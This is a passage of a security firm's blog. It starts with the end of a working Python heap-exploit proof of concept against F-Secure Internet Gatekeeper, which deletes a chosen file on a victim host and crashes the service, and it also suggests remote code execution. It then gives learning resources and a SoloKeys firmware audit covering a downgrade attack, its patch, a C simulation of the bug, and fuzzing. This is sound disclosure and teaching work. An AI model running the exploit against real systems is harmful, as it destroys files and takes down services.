    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r

def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12                 # Padding
    payload += p32(0x1d)                # Fast bin chunk overwrite
    payload += "A" * 488                # Padding
    payload += p32(0xdda00771)          # Address of payload
    payload += p32(0xdda00771 + 4)      # Junk
    r = send_payload(payload)

def massage_heap(filename):
    print "Trying to massage the heap....."
    for x in xrange(100):
        payload = ""
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0xdda0077d)      # Points to where the filename will be in memory
        payload += filename + "\x00"
        payload += "C" * (0x300 - len(payload))
        r = send_payload(payload, content_len=0x80000, nofun=True)
        r.close()
    cut_conn = True
    print "Heap massage done"

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
```

Current exploit reliability is around 60-70% of the total attempts, and our exploit PoC relies on the specific machine as listed in the prerequisites.

Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we'd like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you're interested in working with us, email your RCE PoC to [email protected]@doyensec.com ;)

This critical issue was tracked as [FSC-2019-3](https://www.f-secure.com/en/business/support-and-downloads/security-advisories/fsc-2019-3) and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank [F-Secure](https://www.f-secure.com/) for their cooperation.

## Resources for learning about heap exploitation

#### Exploit walkthroughs

- [Linux Heap Exploitation Intro Series: Set you free() – part 1](https://sensepost.com/blog/2018/linux-heap-exploitation-intro-series-set-you-free-part-1/)
- [Linux Heap Exploitation Intro Series: Set you free() – part 2](https://sensepost.com/blog/2018/linux-heap-exploitation-intro-series-set-you-free-part-2/)

#### GLibC walkthroughs

- [GLibC Malloc for Exploiters - YouTube](https://www.youtube.com/watch?v=z33CYcMf2ug)
- [Understanding the GLibC Implementation - Part 1](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)
- [Understanding the GLibC Implementation - Part 2](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)

#### Tools

- [GEF](https://github.com/hugsy/gef) - Add-on for GDB to assist exploitation. It also has some useful commands for debugging heap exploits
- [Villoc](https://github.com/wapiflapi/villoc) - Visual representation of the heap in HTML

Security Analysis of the Solo Firmware

18 February 2020 at 23:00
blockquote pThis blog post summarizes the results of a collaboration between a href=https://solokeys.com/SoloKeys/a and Doyensec, and was originally a href=https://solokeys.com/blogs/news/security-analysis-of-the-solo-firmware-by-doyensecpublished on the SoloKeys blog/a by Emanuele Cesena. You can download the full security audit report a href=https://doyensec.com/resources/Doyensec_SoloKeys_TestingReport_Q12020_v3.pdfhere/a./p /blockquote div style=text-align: center; img src=../../../public/images/solo_downgrade_attack_code.png width=100% title=SoloKeys firmware snippet alt=SoloKeys firmware snippet align=center style=display: block; margin-left: auto; margin-right: auto; / /div pWe engaged Doyensec to perform a security assessment of a href=https://github.com/solokeys/solo/our firmware/a, v3.0.1 at the time of testing. During a 10 person-day engagement, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and a href=https://github.com/solokeys/solo/pull/368fixed in v3.1.0/a. The a href=https://doyensec.com/resources/Doyensec_SoloKeys_TestingReport_Q12020_v3.pdffull report/a is available with all details, while in this post we’d like to give a high-level summary of the engagement and findings./p h2 id=why-a-security-analysis-why-nowWhy a Security Analysis, Why Now?/h2 pOne of the first requests we received after Solo’s Kickstarter was to run an a href=https://github.com/solokeys/solo/issues/126independent security audit/a. At the time we didn’t have the resources to run it, and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community./p pRecently, we shared that a href=https://solokeys.com/blogs/news/update-on-our-new-and-upcoming-security-keyswe’re building a new model of Solo/a based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). 
As most of our energy will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community./p pTherefore we thought this was a good time for a security analysis./p pWe asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when it is released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet./p h2 id=the-major-finding-downgrade-attackThe Major Finding: Downgrade Attack/h2 pThe security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks, from Jan 21 to Jan 31, 2020./p pIn short, he found a downgrade attack where he was able to “upgrade” the firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities./p pPractically speaking, however, running such an attack against a Solo key requires either physical access to the key or, if attempted from a malicious site, an explicit user acknowledgement on the WebAuthn window./p pstrongThis means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools./strong/p pAlso note that our firmware is digitally signed, and this downgrade attack couldn’t bypass our signature verification. 
Therefore a possible attacker can only install one of our twenty-ish previous releases./p pNeedless to say, we took the vulnerability very seriously and fixed it immediately./p h2 id=anatomy-of-the-downgrade-attackAnatomy of the Downgrade Attack/h2 pThis was the a href=https://github.com/solokeys/solo/blob/3.0.1/targets/stm32l432/bootloader/bootloader.c#L201offending code/a, and this is a href=https://github.com/solokeys/solo/pull/368/files#diff-f7cab51b94eff98a0aff021c872244b4R203the patch/a, which should help explain what happened./p pSolo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the key, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant here, as the attack only allows installing older signed releases./p pThe new firmware is written to the key in chunks. At every write, a pointer to the last written address is updated, so that eventually it points to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order./p pAs an example, suppose the key is running v3.0.1, and take an old firmware, say v3.0.0. Search it for four bytes which, when interpreted as a version number, are greater than v3.0.1. First, send the whole 3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, which encodes version 3.0.0./p pimg src=/public/images/solo_firmware_downgrade_step1.png alt=Firmware downgrade step 1 / Then write the four chosen bytes again at their original offset. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. 
It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! a href=https://github.com/doyensec/SoloKeys-2020Q1-fw-downgrade-PoCHere is a fully working proof-of-concept/a./p pimg src=/public/images/solo_firmware_downgrade_step2.png alt=Firmware downgrade step 2 //p h2 id=fuzzing-tinycbor-with-aflFuzzing TinyCBOR with AFL/h2 pThe researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and crash our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework./p pThe fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor, we would be happy to share details and examples./p h2 id=summarySummary/h2 pIn summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional questions, or to help with fuzzing tinycbor, feel free to reach out on Twitter a href=https://twitter.com/[email protected]/a or at a href=mailto:[email protected]@solokeys.com/a./p pWe would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to a href=https://doyensec.comcheck their website/a, and oh, they’re also launching a game soon. Yes, a a href=https://www.h1jack.commobile game with a hacking theme/a!/p
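pTo make the chunk-ordering bug in the Anatomy of the Downgrade Attack section concrete, the following is an added example written for this post; it is not Solo’s bootloader code and does not reproduce the real patch line for line. It models the write handler and version check described above with the vulnerable behaviour (pointer follows the most recent chunk) and the patched behaviour (chunks must be strictly ascending) side by side, then replays the two-step attack against each. Assumptions, all constructed for the example: flash is a 64-byte RAM array, the version is the 4 bytes before last_written_app_address encoded as {major, minor, patch, 0}, signature verification is omitted because the attack does not bypass it, and the “lucky” v3.0.37 bytes are planted at offset 16 of a fake v3.0.0 image to mirror the post’s scenario./p

```c
/* Added example, not Solo's bootloader code.  Models the chunked firmware
 * write and BootDone version check described in the post.  Constructed
 * assumptions: flash is a RAM array, the version is {major, minor, patch, 0}
 * in the 4 bytes before last_written_app_address, no signature check. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define APP_SIZE   64u   /* toy application region (real keys use KiB of flash) */
#define CHUNK_SIZE 16u   /* chunk size used by the simulated updater */

typedef struct { uint8_t major, minor, patch, pad; } version_t;
typedef bool (*write_fn)(uint32_t addr, const uint8_t *data, uint32_t len);

static uint8_t flash[APP_SIZE];
static uint32_t last_written_app_address;
static const version_t running_version = {3, 0, 1, 0};  /* key runs v3.0.1 */

static int version_cmp(version_t a, version_t b)
{
    if (a.major != b.major) return a.major - b.major;
    if (a.minor != b.minor) return a.minor - b.minor;
    return a.patch - b.patch;
}

/* Vulnerable write: any in-bounds address is accepted and the "end of image"
 * pointer follows the most recent chunk wherever it landed. */
static bool boot_write_vulnerable(uint32_t addr, const uint8_t *data, uint32_t len)
{
    if (len < 4 || addr > APP_SIZE || len > APP_SIZE - addr) return false;
    memcpy(&flash[addr], data, len);
    last_written_app_address = addr + len;
    return true;
}

/* Patched write: a chunk may only start at or after the end of the previous
 * one, so the pointer can only ever reach the real end of the image. */
static bool boot_write_fixed(uint32_t addr, const uint8_t *data, uint32_t len)
{
    if (len < 4 || addr > APP_SIZE || len > APP_SIZE - addr) return false;
    if (addr < last_written_app_address) return false;  /* out of order / rewrite */
    memcpy(&flash[addr], data, len);
    last_written_app_address = addr + len;
    return true;
}

/* BootDone check: the 4 bytes before the pointer must decode to a version
 * newer than the running one. */
static bool boot_done(void)
{
    version_t pending;
    if (last_written_app_address < 4) return false;
    memcpy(&pending, &flash[last_written_app_address - 4], 4);
    return version_cmp(pending, running_version) > 0;
}

static void begin_update(void)
{
    memset(flash, 0xff, sizeof flash);
    last_written_app_address = 0;
}

/* Constructed v3.0.0 image: "code" bytes at offset 16 that happen to read
 * as v3.0.37, real version trailer {3,0,0,0} in the last 4 bytes. */
static void build_old_image(uint8_t img[APP_SIZE])
{
    memset(img, 0x90, APP_SIZE);
    img[16] = 3; img[17] = 0; img[18] = 37; img[19] = 0;
    img[APP_SIZE - 4] = 3; img[APP_SIZE - 3] = 0;
    img[APP_SIZE - 2] = 0; img[APP_SIZE - 1] = 0;
}

static bool upload_in_order(write_fn write, const uint8_t img[APP_SIZE])
{
    for (uint32_t off = 0; off < APP_SIZE; off += CHUNK_SIZE)
        if (!write(off, img + off, CHUNK_SIZE)) return false;
    return true;
}

/* The attack from the post: send the whole old image, then resend the bytes
 * at offset 16 so the pointer ends right after them.  Returns true if the
 * key would accept the "upgrade". */
static bool try_downgrade(write_fn write)
{
    uint8_t img[APP_SIZE];
    build_old_image(img);
    begin_update();
    if (!upload_in_order(write, img)) return false;
    if (!write(16, img + 16, 4)) return false;   /* step 2: rewrite 16..19 */
    return boot_done();
}

/* A genuine v3.0.2 image uploaded in order must still be accepted. */
static bool try_legit_upgrade(write_fn write)
{
    uint8_t img[APP_SIZE];
    build_old_image(img);
    img[APP_SIZE - 2] = 2;  /* trailer now says v3.0.2 */
    begin_update();
    return upload_in_order(write, img) && boot_done();
}

int main(void)
{
    printf("vulnerable bootloader accepts downgrade: %d\n", try_downgrade(boot_write_vulnerable));
    printf("patched bootloader accepts downgrade:    %d\n", try_downgrade(boot_write_fixed));
    printf("patched bootloader accepts real upgrade: %d\n", try_legit_upgrade(boot_write_fixed));
    return 0;
}
```

pThe point the model makes is that the version check itself is fine; what was missing is an invariant tying last_written_app_address to the true end of the image. Rejecting any chunk whose start lies below the previous end restores that invariant, and a legitimate in-order upload still passes, which is the check to re-run when the Rust firmware’s updater is reviewed./p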